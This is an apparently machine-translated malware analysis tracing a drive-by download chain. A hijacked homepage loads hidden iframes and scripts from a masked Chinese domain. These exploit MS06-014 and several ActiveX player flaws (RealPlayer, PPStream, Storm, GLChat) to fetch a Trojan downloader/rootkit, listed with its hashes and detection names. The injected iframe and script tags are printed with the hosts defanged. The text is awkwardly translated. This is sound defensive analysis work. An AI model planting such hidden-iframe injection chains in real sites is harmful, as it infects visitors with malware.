Rootkit. win32.ressdt. O/Trojan-Downloader.Win32.Agent.mjp
Original endurer
Version 1st
The homepage contains code:
/---
<IFRAME src = hxxp: // ***. Look *** des ** t **. ***. CN/wmpu/1810.htm? 5918 width = 0 Height = 0> </iframe>
---/
#1 hxxp: // ***. Look *** des ** t **. ***. CN/wmpu/1810.htm? 5918 contains code:
/---
<IFRAME src = ../root/vop.htm width = 50 height = 50 frameborder = 0> </iframe>
---/
#1.1 hxxp: // ***. Look *** des ** t **. ***. cn // root/vop.htm
Output code:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp ://***. look ** des ** t **. ***. CN/root/11.htm '> </iframe>
<SCRIPT src = hxxp: // ***. Look *** des ** t **. ***. CN/root/lzz. js> </SCRIPT>
<SCRIPT src = hxxp: // ***. Look *** des ** t **. ***. CN/root/BB. js> </SCRIPT>
<Script language = "JavaScript" src = hxxp ://***. look ** des ** t **. ***. CN/root/RP. JS> </SCRIPT>
<Script language = "JavaScript" src = hxxp: // ***. Look ** des ** t **. ***. CN/root/rp1.js> </SCRIPT>
<SCRIPT src = hxxp: // ***. Look *** des ** t **. ***. CN/root/PPP. js> </SCRIPT>
---/
Then, a blank page (about: blank) is displayed)
#1.1.1 hxxp: // ***. Look *** des ***. ***. CN/root/11.htm
Use the MS06-014 vulnerability to download hxxp: // ***. Look *** des ***. ***. CN/root/svcos.exe
File Description: D:/test/svcos.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 20:48:57
Modification time: 20:48:57
Access time: 20:49:59
Size: 20625 bytes, 20.145 KB
MD5: 12732b8726845cc29c40c06cb10dce2a
Sha1: 56ba924504107273cd6f26edb858dd33295d79f9
CRC32: f671a2a2
Kaspersky reports as Trojan-Downloader.Win32.Agent.mjp, and rising reports as rootkit. win32.ressdt. O> fsg2.0> 96
#1.1.2 hxxp: // ***. Look *** des ***. ***. CN/root/lzz. js
Download hxxp: // ***. Ban ** KD ** Iye ** d.cn/root/svcos.exe using the vulnerability glchat. glchatctrl.1, CLSID: 61f5c358-60fb-4a23-a312-d2b556620f20.
#1.1.3 hxxp: // ***. Look *** des ***. ***. CN/root/BB. js
Download hxxp: // ***. Ban ** KD ** Iye ** d.cn/root/svcos.exe using the storm audio and video (MPs. stormplayer) Vulnerability
#1.1.4 hxxp: // ***. Look *** des ***. ***. CN/root/RP. js
Use the RealPlayer (ierpctl. ierpctl.1) vulnerability to download hxxp: // ***. Look *** des ** t **. ***. CN/root/svcos.exe
#1.1.5 hxxp: // ***. Look *** des ***. ***. CN/root/rp1.js
Same as above
#1.1.6 hxxp: // ***. Look *** des ***. ***. CN/root/PPP. js
Download hxxp: // ***. Ban ** KD ** Iye ** d.cn/root/svcos.exe using the PPStream (powerplayer. powerplayerctrl.1) Vulnerability
#1.1.7 use baidubar. tool to download hxxp: // ***. Look ** des ** t **. ***. CN/root/Baidu. Cab, which contains baidu.exe